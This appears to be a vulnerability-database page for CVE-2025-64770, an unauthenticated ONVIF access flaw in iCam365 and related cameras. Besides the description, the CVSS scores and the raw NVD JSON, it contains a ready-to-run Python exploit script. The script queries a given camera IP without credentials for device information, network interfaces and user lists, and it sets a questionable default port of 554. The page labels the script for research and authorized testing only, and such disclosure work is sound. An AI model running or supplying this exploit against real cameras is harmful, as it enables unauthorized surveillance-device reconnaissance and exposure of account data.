Security Vulnerability Report
中文
CVE-2025-64770 CVSS 6.8 MEDIUM

CVE-2025-64770

Published: 2025-11-20 21:16:07
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The affected products allow unauthenticated access to Open Network Video Interface Forum (ONVIF) services, which may allow an attacker unauthorized access to camera configuration information.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L

Configurations (Affected Products)

No configuration data available.

iCam365及相关ONVIF兼容摄像头产品(固件版本未明确披露)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import xml.etree.ElementTree as ET # CVE-2025-64770 PoC - ONVIF Unauthenticated Access # Target: Affected camera products with ONVIF service ONVIF_NS = { 'onvif': 'http://www.onvif.org/ver10/device/wsdl', 'tt': 'http://www.onvif.org/ver10/schema' } def build_onvif_request(action): """Build ONVIF SOAP request without authentication""" templates = { 'GetDeviceInformation': '''<?xml version="1.0" encoding="UTF-8"?> <soap-env:Envelope xmlns:soap-env="http://www.w3.org/2003/05/soap-envelope"> <soap-env:Body> <GetDeviceInformation xmlns="http://www.onvif.org/ver10/device/wsdl"/> </soap-env:Body> </soap-env:Envelope>''', 'GetNetworkInterfaces': '''<?xml version="1.0" encoding="UTF-8"?> <soap-env:Envelope xmlns:soap-env="http://www.w3.org/2003/05/soap-envelope"> <soap-env:Body> <GetNetworkInterfaces xmlns="http://www.onvif.org/ver10/device/wsdl"/> </soap-env:Body> </soap-env:Envelope>''', 'GetUsers': '''<?xml version="1.0" encoding="UTF-8"?> <soap-env:Envelope xmlns:soap-env="http://www.w3.org/2003/05/soap-envelope"> <soap-env:Body> <GetUsers xmlns="http://www.onvif.org/ver10/device/wsdl"/> </soap-env:Body> </soap-env:Envelope>''', 'GetProfiles': '''<?xml version="1.0" encoding="UTF-8"?> <soap-env:Envelope xmlns:soap-env="http://www.w3.org/2003/05/soap-envelope"> <soap-env:Body> <GetProfiles xmlns="http://www.onvif.org/ver10/media/wsdl"/> </soap-env:Body> </soap-env:Envelope>''' } return templates.get(action, '') def exploit_cve_2025_64770(target_ip, port=554): """ Exploit CVE-2025-64770: Unauthenticated ONVIF access Args: target_ip: Target camera IP address port: ONVIF service port (default 554) """ endpoints = [ f"http://{target_ip}:{port}/onvif/device_service", f"http://{target_ip}:{port}/onvif/service" ] results = {} headers = { 'Content-Type': 'application/soap+xml; charset=utf-8', 'SOAPAction': 'http://www.onvif.org/ver10/device/wsdl/GetDeviceInformation' } for endpoint in endpoints: try: # Try GetDeviceInformation response = requests.post( endpoint, data=build_onvif_request('GetDeviceInformation'), headers=headers, timeout=10 ) if response.status_code == 200: results['endpoint'] = endpoint results['device_info'] = parse_device_info(response.text) results['vulnerable'] = True # Additional enumeration results['network_interfaces'] = get_network_info(endpoint) results['users'] = get_user_list(endpoint) break except requests.RequestException as e: continue return results def parse_device_info(xml_response): """Parse ONVIF GetDeviceInformation response""" try: root = ET.fromstring(xml_response) info = {} for elem in root.iter(): if elem.tag.endswith('Manufacturer'): info['manufacturer'] = elem.text elif elem.tag.endswith('Model'): info['model'] = elem.text elif elem.tag.endswith('FirmwareVersion'): info['firmware'] = elem.text elif elem.tag.endswith('SerialNumber'): info['serial'] = elem.text return info except: return {'error': 'Failed to parse response'} def get_network_info(endpoint): """Enumerate network interfaces via ONVIF""" headers = { 'Content-Type': 'application/soap+xml; charset=utf-8' } try: resp = requests.post(endpoint, data=build_onvif_request('GetNetworkInterfaces'), headers=headers, timeout=10) return resp.text if resp.status_code == 200 else 'Failed' except: return 'Request failed' def get_user_list(endpoint): """Enumerate users via ONVIF - exposes credential info""" headers = { 'Content-Type': 'application/soap+xml; charset=utf-8' } try: resp = requests.post(endpoint, data=build_onvif_request('GetUsers'), headers=headers, timeout=10) return resp.text if resp.status_code == 200 else 'Failed' except: return 'Request failed' if __name__ == '__main__': import sys if len(sys.argv) < 2: print('Usage: python cve_2025_64770.py <target_ip> [port]') sys.exit(1) target = sys.argv[1] port = int(sys.argv[2]) if len(sys.argv) > 2 else 554 print(f'[*] Scanning {target} for CVE-2025-64770...') results = exploit_cve_2025_64770(target, port) if results.get('vulnerable'): print('[+] Target is VULNERABLE to CVE-2025-64770') print(f'[+] Working endpoint: {results["endpoint"]}') print(f'[+] Device Info: {results.get("device_info", {})}') else: print('[-] Target may not be vulnerable or ONVIF service not found')

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64770", "sourceIdentifier": "[email protected]", "published": "2025-11-20T21:16:06.753", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The affected products allow unauthenticated access to Open Network Video Interface Forum (ONVIF) services, which may allow an attacker unauthorized access to camera configuration information."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 7.0, "baseSeverity": "HIGH", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "ADJACENT_NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "references": [{"url": "https://github.com/cisagov/CSAF/blob/develop/csaf_files/OT/white/2025/icsa-25-324-02.json", "source": "[email protected]"}, {"url": "https://icam365.net/en/aboutUs/", "source": "[email protected]"}, {"url": "https://www.cisa.gov/news-events/ics-advisories/icsa-25-324-02", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.